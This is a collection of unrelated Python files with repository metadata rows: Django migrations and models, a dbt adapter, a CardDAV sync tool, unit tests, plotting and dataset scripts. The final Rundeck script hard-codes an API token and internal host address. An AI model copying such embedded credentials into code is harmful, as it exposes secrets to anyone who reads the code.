def make_roi_car_cls_rot_predictor(cfg):
    """Instantiate the predictor class named in the config."""
    predictor_cls = _ROI_CAR_CLS_ROT_PREDICTOR[cfg.MODEL.ROI_CAR_CLS_ROT_HEAD.PREDICTOR]
    return predictor_cls(cfg)
0decb58388efdb35753edb1a250f99a3c2fcefa4 | 771 | py | Python | coderdojochi/migrations/0021_auto_20180815_1757.py | rgroves/weallcode-website | ead60d3272dbbfe610b2d500978d1de44aef6386 | [
"MIT"
] | 15 | 2019-05-04T00:24:00.000Z | 2021-08-21T16:34:05.000Z | coderdojochi/migrations/0021_auto_20180815_1757.py | rgroves/weallcode-website | ead60d3272dbbfe610b2d500978d1de44aef6386 | [
"MIT"
] | 73 | 2019-04-24T15:53:42.000Z | 2021-08-06T20:41:41.000Z | coderdojochi/migrations/0021_auto_20180815_1757.py | rgroves/weallcode-website | ead60d3272dbbfe610b2d500978d1de44aef6386 | [
"MIT"
] | 20 | 2019-04-26T20:13:08.000Z | 2021-06-21T14:53:21.000Z | # Generated by Django 2.0.6 on 2018-08-15 22:57
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add home_address, phone and work_place
    (all optional CharFields) to the Mentor model.  Do not edit by hand;
    generate a follow-up migration for further schema changes.
    """
    dependencies = [
        ('coderdojochi', '0020_mentor_shirt_size'),
    ]
    operations = [
        migrations.AddField(
            model_name='mentor',
            name='home_address',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='mentor',
            name='phone',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='mentor',
            name='work_place',
            field=models.CharField(blank=True, max_length=255, null=True),
        ),
    ]
| 26.586207 | 74 | 0.581064 | 678 | 0.879377 | 0 | 0 | 0 | 0 | 0 | 0 | 142 | 0.184176 |
0def13794ee3ca070ffd095ffc65ba6c515362be | 350 | py | Python | archives/build_wget.py | onai/code-ecosystem-analyzer | 964d1ef5ec4d8f774c52aa2718663bb455d62ecb | [
"Apache-2.0"
] | null | null | null | archives/build_wget.py | onai/code-ecosystem-analyzer | 964d1ef5ec4d8f774c52aa2718663bb455d62ecb | [
"Apache-2.0"
] | null | null | null | archives/build_wget.py | onai/code-ecosystem-analyzer | 964d1ef5ec4d8f774c52aa2718663bb455d62ecb | [
"Apache-2.0"
] | null | null | null | import sys
with open(sys.argv[1]) as handle:
for new_line in handle:
dest = new_line.split('/')[4] + '_' + new_line.split('/')[5] + '.zip'
#print('curl -Ls -I -o /dev/null -w \'%{url_effective}\\n\' ' + new_line.strip())
print('curl -L --user ' + sys.argv[2] + ':' + sys.argv[3] + ' ' + new_line.strip() + ' -o ' + dest)
| 43.75 | 107 | 0.525714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 125 | 0.357143 |
0df3e3502236c625d081f0f74dbbd4aea76a92c9 | 630 | py | Python | authors/apps/followers/models.py | andela/ah-code-titans | 4f1fc77c2ecdf8ca15c24327d39fe661eac85785 | [
"BSD-3-Clause"
] | null | null | null | authors/apps/followers/models.py | andela/ah-code-titans | 4f1fc77c2ecdf8ca15c24327d39fe661eac85785 | [
"BSD-3-Clause"
] | 20 | 2018-11-26T16:22:46.000Z | 2018-12-21T10:08:25.000Z | authors/apps/followers/models.py | andela/ah-code-titans | 4f1fc77c2ecdf8ca15c24327d39fe661eac85785 | [
"BSD-3-Clause"
] | 3 | 2019-01-24T15:39:42.000Z | 2019-09-25T17:57:08.000Z | from django.db import models
from ..authentication.models import User
class Follower(models.Model):
    """
    Store data on following statistics for users.

    Each row records that ``user`` follows ``followed``; the pair is
    unique, so a user cannot follow the same person twice.
    """
    # The follower side of the relationship.
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='follower')
    # The user being followed.
    followed = models.ForeignKey(User, on_delete=models.CASCADE, related_name='followed')
    # Timestamp set automatically when the follow is created.
    followed_at = models.DateTimeField(auto_created=True, auto_now_add=True)
    class Meta:
        unique_together = ('user', 'followed')
    def __str__(self):
        return '{follower} follows {followed}'.format(
            follower=self.user, followed=self.followed
        )
| 30 | 89 | 0.696825 | 556 | 0.88254 | 0 | 0 | 0 | 0 | 0 | 0 | 128 | 0.203175 |
0df56e29aeb7cee2f088a3c93b1f67587665424d | 477 | py | Python | dbt/adapters/doris/__init__.py | qiulin/dbt-doris | 4786532ed288b32a729675a4dd01b6e4da993c60 | [
"Apache-2.0"
] | 2 | 2022-02-06T02:15:33.000Z | 2022-02-22T03:58:53.000Z | dbt/adapters/doris/__init__.py | qiulin/dbt-doris | 4786532ed288b32a729675a4dd01b6e4da993c60 | [
"Apache-2.0"
] | null | null | null | dbt/adapters/doris/__init__.py | qiulin/dbt-doris | 4786532ed288b32a729675a4dd01b6e4da993c60 | [
"Apache-2.0"
] | null | null | null | from dbt.adapters.doris.connections import DorisConnectionManager
from dbt.adapters.doris.connections import DorisCredentials
from dbt.adapters.doris.relation import DorisRelation
from dbt.adapters.doris.column import DorisColumn
from dbt.adapters.doris.impl import DorisAdapter
from dbt.adapters.base import AdapterPlugin
from dbt.include import doris
# Entry point discovered by dbt: bundles the Doris adapter implementation,
# its credential class, and the package's include path into one plugin.
Plugin = AdapterPlugin(
    adapter=DorisAdapter,
    credentials=DorisCredentials,
    include_path=doris.PACKAGE_PATH)
| 31.8 | 65 | 0.840671 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0df7ced38cda902e631d021c1255e468e0aeb410 | 750 | py | Python | revelation/core/urls.py | Federico-Comesana/revelatte | ccd50831dcdec8bc4a7e83b062d0309f6e4feee2 | [
"MIT"
] | null | null | null | revelation/core/urls.py | Federico-Comesana/revelatte | ccd50831dcdec8bc4a7e83b062d0309f6e4feee2 | [
"MIT"
] | null | null | null | revelation/core/urls.py | Federico-Comesana/revelatte | ccd50831dcdec8bc4a7e83b062d0309f6e4feee2 | [
"MIT"
] | null | null | null | from django.contrib.auth.decorators import login_required
from django.conf.urls import url
import views
# URL routes for the revelation app.  Only the delete view requires login;
# <pk> captures the primary key of the user/revelation being addressed.
urlpatterns = [
    # Public listing of revelations.
    url(r'public/$',
        views.RevelationModelListView.as_view(),
        name='revelation-list'),
    # A user's profile page.
    url(r'u/(?P<pk>\d+)/$',
        views.UserProfileView.as_view(),
        name='user-view'),
    # Delete a revelation (authenticated users only).
    url(r'delete/(?P<pk>\d+)/$',
        login_required(views.RevelationModelDeleteView.as_view()),
        name='revelation-delete'),
    # Create a new revelation.
    url(r'create/$', views.RevelationModelCreateView.as_view(),
        name='revelation-create'),
    # Detail view for a single revelation.
    url(r'r/(?P<pk>\d+)/$',
        views.RevelationModelDetailView.as_view(),
        name='revelation-view'),
    # Home page.
    url(r'^$',
        views.HomePageView.as_view(),
        name='home'),
]
| 24.193548 | 66 | 0.617333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 175 | 0.233333 |
0df83b2e848cfa6dd57435a1970875947775c426 | 6,395 | py | Python | pycarddav/controllers.py | mathstuf/pycarddav | 8bfdbef79c11ed9b14304773d26b1542d16ef2b2 | [
"MIT"
] | null | null | null | pycarddav/controllers.py | mathstuf/pycarddav | 8bfdbef79c11ed9b14304773d26b1542d16ef2b2 | [
"MIT"
] | null | null | null | pycarddav/controllers.py | mathstuf/pycarddav | 8bfdbef79c11ed9b14304773d26b1542d16ef2b2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# vim: set ts=4 sw=4 expandtab sts=4:
# Copyright (c) 2011-2013 Christian Geier & contributors
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
syncs the remote database to the local db
"""
from pycarddav import backend
from pycarddav import carddav
from pycarddav import model
from pycarddav import ui
from os import path
import logging
import sys
def query(conf):
    """Run a local address-book query or management action.

    Depending on *conf*, this imports cards, writes a backup, or marks a
    card for deletion — each of those paths terminates the process via
    ``sys.exit()``.  Otherwise it prints the cards matching the search
    string and returns 0.
    """
    # testing if the db exists
    if not path.exists(conf.sqlite__path):
        sys.exit(str(conf.sqlite__path) + " file does not exist, please sync"
                 " with pycardsyncer first.")
    search_string = conf.cmd__search_string.decode("utf-8")
    my_dbtool = backend.SQLiteDb(conf.sqlite__path, "utf-8", "stricts", False)
    # import: load vcards from a file into the local db as NEW
    if conf.cmd__importing:
        cards = model.cards_from_file(conf.cmd__importing)
        for card in cards:
            my_dbtool.update(card, status=backend.NEW)
        sys.exit()
    # backup: dump matching (or all) vcards to a single .vcf file
    if conf.cmd__backup:
        with open(conf.cmd__backup, 'w') as vcf_file:
            if search_string == "":
                hreflist = my_dbtool.get_all_vref_from_db()
            else:
                hreflist = my_dbtool.search(search_string)
            for href in hreflist:
                vcard = my_dbtool.get_vcard_from_db(href)
                vcf_file.write(vcard.vcf.encode('utf-8'))
            sys.exit()
    # mark a card for deletion
    if conf.cmd__delete:
        hrefs = my_dbtool.search(search_string)
        # BUGFIX: these comparisons used ``is 0`` / ``is 1``, which only
        # works because CPython caches small integers; compare by value.
        if len(hrefs) == 0:
            sys.exit('Found no matching cards.')
        elif len(hrefs) == 1:
            href = hrefs[0]
        else:
            # Several matches: let the user pick one interactively.
            pane = ui.VCardChooserPane(my_dbtool, hrefs)
            ui.start_pane(pane)
            card = pane._walker.selected_vcard
            href = card.href
        if href in my_dbtool.get_new():
            # cards not yet on the server get deleted directly, otherwise we
            # will try to delete them on the server later (where they don't
            # exist) and this will raise an exception
            my_dbtool.delete_vcard_from_db(href)
        else:
            my_dbtool.mark_delete(href)
            print('vcard "%s" deleted from local db, will be deleted ' % href +
                  'on the server on the next sync')
        sys.exit()
    # Plain search: print each matching card in the requested format.
    print("searching for " + conf.cmd__search_string + "...")
    result = my_dbtool.search(search_string)
    for one in result:
        vcard = my_dbtool.get_vcard_from_db(one)
        if conf.cmd__mutt:
            lines = vcard.print_email()
        elif conf.cmd__tel:
            lines = vcard.print_tel()
        elif conf.cmd__display_all:
            lines = vcard.pretty
        else:
            lines = vcard.pretty_min
        if lines != '':
            print(lines.encode('utf-8'))
    return 0
def sync(conf):
    """Synchronise the local SQLite cache with the remote CardDAV server.

    Order matters: pull remote changes first (local edits are overwritten),
    then push local modifications, upload new cards, delete locally removed
    cards on the server, and finally purge cards that vanished server-side.
    """
    syncer = carddav.PyCardDAV(conf.dav__resource,
                               user=conf.dav__user,
                               passwd=conf.dav__passwd,
                               write_support=conf.write_support,
                               verify=conf.dav__verify,
                               auth=conf.dav__auth)
    my_dbtool = backend.SQLiteDb(conf.sqlite__path, "utf-8", "stricts", conf.debug)
    # sync: pull every remote vcard whose etag differs from the cached one
    abook = syncer.get_abook()  # type (abook): dict
    for href, etag in abook.iteritems():
        if my_dbtool.needs_update(href, etag):
            logging.debug("getting %s etag: %s", href, etag)
            vcard = syncer.get_vcard(href)
            my_dbtool.update(vcard, href, etag=etag)
    remote_changed = False
    # for now local changes overwritten by remote changes
    logging.debug("looking for locally changed vcards...")
    hrefs = my_dbtool.changed
    for href in hrefs:
        logging.debug("trying to update %s", href)
        card = my_dbtool.get_vcard_from_db(href)
        logging.debug("%s", my_dbtool.get_etag(href))
        syncer.update_vcard(card.vcf, href, None)
        my_dbtool.reset_flag(href)
        remote_changed = True
    # uploading cards that so far exist only locally
    hrefs = my_dbtool.get_new()
    for href in hrefs:
        logging.debug("trying to upload new card %s", href)
        card = my_dbtool.get_vcard_from_db(href)
        (href_new, etag_new) = syncer.upload_new_card(card.vcf)
        # the server assigns the definitive href; remap the local row
        my_dbtool.update_href(href, href_new, status=backend.OK)
        remote_changed = True
    # deleting locally deleted cards on the server
    hrefs_etags = my_dbtool.get_marked_delete()
    for href, etag in hrefs_etags:
        logging.debug('trying to delete card %s', href)
        syncer.delete_vcard(href, etag)
        my_dbtool.delete_vcard_from_db(href)
        remote_changed = True
    # detecting remote-deleted cards
    # is there a better way to compare a list of unicode() with a list of str()
    # objects?
    if remote_changed:
        # re-fetch the remote index and purge local rows that vanished there
        abook = syncer.get_abook()  # type (abook): dict
        rlist = my_dbtool.get_all_vref_from_db_not_new()
        delete = set(rlist).difference(abook.keys())
        for href in delete:
            my_dbtool.delete_vcard_from_db(href)
| 36.542857 | 83 | 0.640813 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,376 | 0.37154 |
0dfaaf84879c7de397b353788d87c5237fcb9080 | 2,483 | py | Python | _test_request.py | arshadkazmi42/crul | 7b0b7674afaf4d8c75d961612f6813e97a7d7008 | [
"MIT"
] | 6 | 2021-05-18T13:47:55.000Z | 2021-12-16T18:18:41.000Z | _test_request.py | arshadkazmi42/crul | 7b0b7674afaf4d8c75d961612f6813e97a7d7008 | [
"MIT"
] | null | null | null | _test_request.py | arshadkazmi42/crul | 7b0b7674afaf4d8c75d961612f6813e97a7d7008 | [
"MIT"
] | 2 | 2022-01-05T04:56:46.000Z | 2022-01-12T05:10:57.000Z | import unittest
from unittest.mock import Mock, patch
from request import Request
# Canned payload that the fake HTTP response below reports.
RESPONSE = {
    "status": "success",
    "message": "Processed"
}
class Response:
    """Minimal stand-in for requests.Response: exposes .text and .json()."""
    def __init__(self):
        self.text = RESPONSE['message']
    def json(self):
        return RESPONSE
# Shared fake response injected into the mocked requests calls below.
mock_response = Response()
class TestRequest(unittest.TestCase):
    """Unit tests for Request; network calls are mocked with unittest.mock.

    Consistency fix: the mocks injected for ``requests.get`` in the last
    two tests were misleadingly named ``mock_post``; they are now named
    ``mock_get`` like in test_get.
    """

    def test_init(self):
        """A fresh Request carries non-None default headers and timeout."""
        request = Request()
        self.assertNotEqual(request.headers, None, f'Should not be None')
        self.assertNotEqual(request.timeout, None, f'Should not be None')

    @patch('request.requests.head')
    def test_head(self, mock_head):
        """head() proxies the underlying requests.head response."""
        URL = 'https://example.com/working'
        mock_head.return_value.status_code = 200
        request = Request()
        self.assertEqual(request.head(URL).status_code, 200, f'Should return 200 status code')

    @patch('request.requests.head')
    def test_status_code_400(self, mock_head):
        """get_status_code() returns the raw HTTP status code."""
        URL = 'https://example.com/not_found'
        mock_head.return_value.status_code = 400
        request = Request()
        self.assertEqual(request.get_status_code(URL), 400, f'Should return 400 status code')

    @patch('request.requests.get')
    def test_get(self, mock_get):
        """get() returns a response whose json() matches the canned payload."""
        URL = 'https://example.com/working'
        mock_get.return_value = mock_response
        request = Request()
        response = request.get(URL)
        response = response.json()
        self.assertEqual(response['status'], RESPONSE['status'], f'Should return success status')
        self.assertEqual(response['message'], RESPONSE['message'], f'Should return Processed message')

    @patch('request.requests.get')
    def test_get_text_response(self, mock_get):
        """get_text_response() returns the body text of the response."""
        URL = 'https://example.com/working'
        mock_get.return_value = mock_response
        request = Request()
        response = request.get_text_response(URL)
        self.assertEqual(response, RESPONSE['message'], f'Should {RESPONSE["message"]} message')

    @patch('request.requests.get')
    def test_get_json_response(self, mock_get):
        """get_json_response() returns the parsed JSON payload."""
        URL = 'https://example.com/working'
        mock_get.return_value = mock_response
        request = Request()
        response = request.get_json_response(URL)
        self.assertEqual(response['status'], RESPONSE['status'], f'Should return success status')
        self.assertEqual(response['message'], RESPONSE['message'], f'Should return Processed message')
if __name__ == '__main__':
    # Discover and run all TestCase methods in this module.
    unittest.main()
216e58dc7513012f69f864fede95e2d9e5c499dc | 470 | py | Python | kirbytoolkit/tests/test_jackknife.py | matthewkirby/kirby_toolkit | 37968dfd05d628694f3c52a23a15641aa8eee5ff | [
"MIT"
] | null | null | null | kirbytoolkit/tests/test_jackknife.py | matthewkirby/kirby_toolkit | 37968dfd05d628694f3c52a23a15641aa8eee5ff | [
"MIT"
] | null | null | null | kirbytoolkit/tests/test_jackknife.py | matthewkirby/kirby_toolkit | 37968dfd05d628694f3c52a23a15641aa8eee5ff | [
"MIT"
] | null | null | null | import numpy as np
import kirbytoolkit as ktk
def test_jackknife_arr():
arr = [1, 2, 2, 3, 4]
jkvar_true = 0.26
jkvar_code = ktk.jackknife_array(arr)
np.testing.assert_almost_equal(jkvar_code, jkvar_true, decimal=7)
# Test a longer array
arr = np.loadtxt('randomdata.dat')
jkvar_true = 0.003031329328040*0.003031329328040
jkvar_code = ktk.jackknife_array(arr)
np.testing.assert_almost_equal(jkvar_code, jkvar_true, decimal=7)
| 27.647059 | 69 | 0.717021 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 37 | 0.078723 |
216ebd24f2457cf9469911c06b29cd3b21471003 | 530 | py | Python | demo-001.py | zhouyuanmin/MyCode | dbc7df8dc5eba419340ef9aafed75af24f883381 | [
"MIT"
] | 1 | 2021-01-22T03:15:29.000Z | 2021-01-22T03:15:29.000Z | demo-001.py | zhouyuanmin/MyCode | dbc7df8dc5eba419340ef9aafed75af24f883381 | [
"MIT"
] | null | null | null | demo-001.py | zhouyuanmin/MyCode | dbc7df8dc5eba419340ef9aafed75af24f883381 | [
"MIT"
] | null | null | null | """
使用装饰器限制函数的调用次数
"""
import functools
def call_limit(count):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if decorator.calls >= count:
raise AssertionError(f"单个程序最多允许调用此方法{count}次")
decorator.calls += 1
return func(*args, **kw)
decorator.calls = 0
return wrapper
return decorator
@call_limit(5)
def demo(a, b):
print(a, b)
if __name__ == '__main__':
for i in range(20):
demo(i, i ** 2)
| 17.096774 | 62 | 0.558491 | 0 | 0 | 0 | 0 | 304 | 0.518771 | 0 | 0 | 112 | 0.191126 |
216ee6cd0a2a320e0ac816601363649bae571b45 | 1,691 | py | Python | test/tests/set.py | jvkersch/pyston | 2c7e7a5e0ed7a0a8b4528919f855fa8336b43902 | [
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | test/tests/set.py | jvkersch/pyston | 2c7e7a5e0ed7a0a8b4528919f855fa8336b43902 | [
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | test/tests/set.py | jvkersch/pyston | 2c7e7a5e0ed7a0a8b4528919f855fa8336b43902 | [
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | s1 = {1}
def sorted(s):
l = list(s)
l.sort()
return repr(l)
s1 = set() | set(range(3))
print sorted(s1)
s2 = set(range(1, 5))
print sorted(s2)
print repr(sorted(s1)), str(sorted(s1))
print sorted(s1 - s2)
print sorted(s2 - s1)
print sorted(s1 ^ s2)
print sorted(s1 & s2)
print sorted(s1 | s2)
print len(set(range(5)))
s = set(range(5))
print sorted(s)
s.add(3)
print sorted(s)
s.add("")
print len(s)
s.add(None)
print len(s)
print set([1])
for i in set([1]):
print i
s = frozenset(range(5))
print len(s)
print sorted(s)
print frozenset()
print hasattr(s, "remove")
print hasattr(s, "add")
print frozenset() | frozenset()
print set() | frozenset()
print frozenset() | set()
print set() | set()
for i in xrange(8):
print i, i in set(range(2, 5))
print i, i in frozenset(range(2, 5))
s = set(range(5))
print len(s)
s.clear()
print s
s.update((10, 15))
print sorted(s)
s.update((10, 15), range(8))
print sorted(s)
s.remove(6)
print sorted(s)
try:
s.remove(6)
except KeyError, e:
print e
def f2():
print {5}
f2()
s = set([])
s2 = s.copy()
s.add(1)
print s, s2
s1 = set([3, 5])
s2 = set([1, 5])
print sorted(s1.union(s2)), sorted(s1.intersection(s2))
print sorted(s1.union(range(5, 7))), sorted(s1.intersection(range(5, 7)))
print sorted(s2.union([], [], [], [])), sorted(s2.intersection())
s = frozenset([1, 5])
d = s.difference([1], [1], [2])
print d, len(s)
print
l = []
s = set(range(5))
while s:
l.append(s.pop())
l.sort()
print l
s = set([1])
s.discard(1)
print s
s.discard(1)
print s
s = set(range(5))
for i in xrange(10):
s2 = set(range(i))
print s.issubset(s2), s.issuperset(s2), s == s2, s != s2, s.difference(s2)
| 15.234234 | 78 | 0.608516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0.00887 |
216f4275a182a3efa14efecfb81fc95c79e95c84 | 2,720 | py | Python | scripts/gen_train_test.py | wesleylp/CPE775 | 3df3c053e9d6da83035c8f2620c3951f7ff94975 | [
"MIT"
] | 13 | 2017-11-23T12:23:50.000Z | 2020-12-27T10:36:08.000Z | scripts/gen_train_test.py | wesleylp/CPE775 | 3df3c053e9d6da83035c8f2620c3951f7ff94975 | [
"MIT"
] | 1 | 2018-04-19T02:16:34.000Z | 2018-04-19T13:37:23.000Z | scripts/gen_train_test.py | wesleylp/CPE775 | 3df3c053e9d6da83035c8f2620c3951f7ff94975 | [
"MIT"
] | 3 | 2018-11-15T00:01:09.000Z | 2021-05-11T06:27:46.000Z | import os
import argparse
import glob
import pandas as pd
from cpe775 import utils
if __name__ == '__main__':
    # CLI: positional dataset root plus optional output dir for the CSV
    # indexes of the 300-W facial-landmark splits.
    parser = argparse.ArgumentParser()
    parser.add_argument('data_dir', metavar='DIR')
    parser.add_argument('--out-dir', metavar='DIR')
    args = parser.parse_args()
    # Output to the data dir file if out dir was not set
    args.out_dir = args.out_dir or args.data_dir
    # Training set: helen + lfpw train splits plus all of afw.
    train_files = glob.glob(os.path.join(args.data_dir, 'helen', 'trainset', '**', '*.pts'), recursive=True)
    train_files += glob.glob(os.path.join(args.data_dir, 'lfpw', 'trainset', '**', '*.pts'), recursive=True)
    train_files += glob.glob(os.path.join(args.data_dir, 'afw', '**', '*.pts'), recursive=True)
    print('Found {} train files'.format(len(train_files)))
    train_set_fname = os.path.join(args.out_dir, 'train.csv')
    train_df = utils.read_pts(train_files, common_path=args.data_dir)
    train_df.to_csv(train_set_fname, header=None, index=False)
    print('Saving train set at {}'.format(os.path.abspath(train_set_fname)))
    # "Common" test subset: helen + lfpw test splits.
    common_test_files = glob.glob(os.path.join(args.data_dir, 'helen', 'testset', '**', '*.pts'), recursive=True)
    common_test_files += glob.glob(os.path.join(args.data_dir, 'lfpw', 'testset', '**', '*.pts'), recursive=True)
    print('Found {} files from the common subset of the 300W public test set'.format(len(common_test_files)))
    common_set_fname = os.path.join(args.out_dir, 'common_test.csv')
    common_df = utils.read_pts(common_test_files, common_path=args.data_dir)
    common_df.to_csv(common_set_fname, header=None, index=False)
    print('Saving common subset at {}'.format(os.path.abspath(common_set_fname)))
    # "Challenging" test subset: ibug images.
    challenging_test_files = glob.glob(os.path.join(args.data_dir, 'ibug', '**', '*.pts'), recursive=True)
    print('Found {} files from the challenging subset of the 300W public test set'.format(len(challenging_test_files)))
    challenging_set_fname = os.path.join(args.out_dir, 'challenging_test.csv')
    challenging_df = utils.read_pts(challenging_test_files, common_path=args.data_dir)
    challenging_df.to_csv(challenging_set_fname, header=None, index=False)
    print('Saving challenging subset at {}'.format(os.path.abspath(challenging_set_fname)))
    # 300W private test set (folders named 0?_*).
    w300_test_files = glob.glob(os.path.join(args.data_dir, '300W', '0?_*', '**', '*.pts'), recursive=True)
    print('Found {} files from the 300W private test'.format(len(w300_test_files)))
    w300_set_fname = os.path.join(args.out_dir, 'w300_test.csv')
    w300_df = utils.read_pts(w300_test_files, common_path=args.data_dir)
    w300_df.to_csv(w300_set_fname, header=None, index=False)
    print('Saving w300 private set at {}'.format(os.path.abspath(w300_set_fname)))
| 44.590164 | 119 | 0.715074 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 642 | 0.236029 |
21704be6a53209ee30b09ce10c3956a6c5b8c8ba | 1,395 | py | Python | plot.py | corollari/gradient-descent | 089905ab0f4de2c360cfef4fa4957e9c181f27c3 | [
"Unlicense"
] | 1 | 2019-03-06T19:43:25.000Z | 2019-03-06T19:43:25.000Z | plot.py | corollari/gradient-descent | 089905ab0f4de2c360cfef4fa4957e9c181f27c3 | [
"Unlicense"
] | null | null | null | plot.py | corollari/gradient-descent | 089905ab0f4de2c360cfef4fa4957e9c181f27c3 | [
"Unlicense"
] | null | null | null | import matplotlib
import numpy as np
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import random
from sympy import symbols, diff, N
def fun(X, Y):
    """Gaussian bump of height 2 centred at the origin (elementwise on arrays).

    A second, shifted Gaussian from the original experiment was already
    commented out and is intentionally omitted.
    """
    return 2.0 * np.exp(-(X ** 2 + Y ** 2))
def symfun(X, Y):
    """Same surface as fun(), written via e ** (...) so that sympy symbols
    can be passed in as well (np.exp(1) is simply the float e)."""
    e = np.exp(1)
    return 2 * e ** (-X ** 2 - Y ** 2)
delta = 0.025
# Sample the surface on a grid for the contour plot.
x = np.arange(-3.0, 3.0, delta)
y = np.arange(-2.0, 2.0, delta)
X, Y = np.meshgrid(x, y)
Z1 = np.exp(-X**2 - Y**2)  # not used below; leftover from a two-bump variant
Z2 = np.exp(-(X - 1)**2 - (Y - 1)**2)  # likewise unused here
Z = fun(X, Y)
fig, ax = plt.subplots()
CS = ax.contour(X, Y, Z)
ax.clabel(CS, inline=1, fontsize=10)
ax.set_title('Simplest default with labels')
# Random starting point in [-2, 2) x [-2, 2).
o=[(random.random()-0.5)*4, (random.random()-0.5)*4]
# Build the symbolic gradient of the surface with sympy.
x, y = symbols('x y', real=True)
dx=diff(symfun(x, y), x)
dy=diff(symfun(x,y), y)
d=[dx.subs({x:o[0], y:o[1]}), dy.subs({x:o[0], y:o[1]})]
alpha=0.7
i=0
# Gradient *ascent*: step along +gradient until its magnitude is tiny
# (near the maximum at the origin) or 1000 iterations elapse.
while bool((d[0]**2+d[1]**2)>=1e-4) and i<1000:
    d=[dx.subs({x:o[0], y:o[1]}), dy.subs({x:o[0], y:o[1]})]
    no=[o[0]+d[0]*alpha, o[1]+d[1]*alpha]
    #plt.plot(np.array([o[0], no[0]]), np.array([o[1], no[1]]), color="#"+hex(i)[2:]+""+hex(i)[2:]+""+hex(i)[2:])
    # Grey level encodes the iteration number (values cycle over 16..255).
    plt.plot(o[0], o[1], color="#"+hex(i%(256-16)+16)[2:]+""+hex(i%(256-16)+16)[2:]+""+hex(i%(256-16)+16)[2:], marker='o')
    o=no
    i+=1
plt.plot(o[0], o[1], color="#"+hex(i%(256-16)+16)[2:]+""+hex(i%(256-16)+16)[2:]+""+hex(i%(256-16)+16)[2:], marker='o')
plt.show()
| 31.704545 | 122 | 0.5319 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 243 | 0.174194 |
2170971213155f1239bf003e5ae24a6a445bc252 | 639 | py | Python | src/app.py | reinzor/selfieboot2016 | 967a5cb429ae98293e2f0e8d99da2c8edf4e72c0 | [
"MIT"
] | null | null | null | src/app.py | reinzor/selfieboot2016 | 967a5cb429ae98293e2f0e8d99da2c8edf4e72c0 | [
"MIT"
] | null | null | null | src/app.py | reinzor/selfieboot2016 | 967a5cb429ae98293e2f0e8d99da2c8edf4e72c0 | [
"MIT"
] | null | null | null | '''
Selfiebooth Baas van Horst aan de Maas 2016 - CameraPuzzle
===========================
This demonstrates using Scatter widgets with a live camera.
You should see a shuffled grid of rectangles that make up the
camera feed. You can drag the squares around to see the
unscrambled camera feed or double click to scramble the grid
again.
'''
from kivy.app import App
from kivy.uix.widget import Widget
from puzzle import Puzzle
class SelfieboothApp(App):
    """Kivy application whose root widget hosts the camera puzzle."""

    def build(self):
        """Assemble and return the widget tree: a bare container holding the puzzle."""
        container = Widget()
        camera_puzzle = Puzzle(resolution=(640, 480), play=True)
        container.add_widget(camera_puzzle)
        return container
if __name__ == '__main__':
    # Guard the entry point so importing this module does not launch the GUI.
    SelfieboothApp().run()
| 23.666667 | 61 | 0.697966 | 183 | 0.286385 | 0 | 0 | 0 | 0 | 0 | 0 | 341 | 0.533646 |
217147b682f00559525d500ab3019c807cac7a67 | 521 | py | Python | deploy/test.py | zhxiaohe/starwars_api | f1b729e819eb19e5eb59630bed56b13127eb1ef2 | [
"MIT"
] | null | null | null | deploy/test.py | zhxiaohe/starwars_api | f1b729e819eb19e5eb59630bed56b13127eb1ef2 | [
"MIT"
] | null | null | null | deploy/test.py | zhxiaohe/starwars_api | f1b729e819eb19e5eb59630bed56b13127eb1ef2 | [
"MIT"
] | null | null | null | #coding=utf-8
import requests,json
# Rundeck API smoke test: run `whoami` on the tagged nodes of the "fengyang"
# project via the /run/command endpoint.
# NOTE(review): the auth token and host are hard-coded credentials; move them
# to environment variables or a secrets store before sharing this file.
headers = {'X-Rundeck-Auth-Token': '2EcW3xe0urFLrilqUOGCVYLXSbdByk2e','Accept': 'application/json'}
headers['Content-type']='application/json'
rundeck_host= 'http://10.1.16.26:4440'
url = rundeck_host+'/api/16/project/fengyang/run/command'
data={
    'project':'fengyang',
    'exec':'whoami',
    'filter': 'tags: member-web-1,member-web-2',
    'nodeKeepgoing': False  # whether to keep going after an execution error
}
r = requests.post(url, headers=headers,data=json.dumps(data))
# print() calls instead of Python-2 print statements, so the script also runs
# (and fails loudly instead of at parse time) under Python 3.
print(r.status_code)
print(r.text)
| 23.681818 | 99 | 0.712092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 309 | 0.571165 |
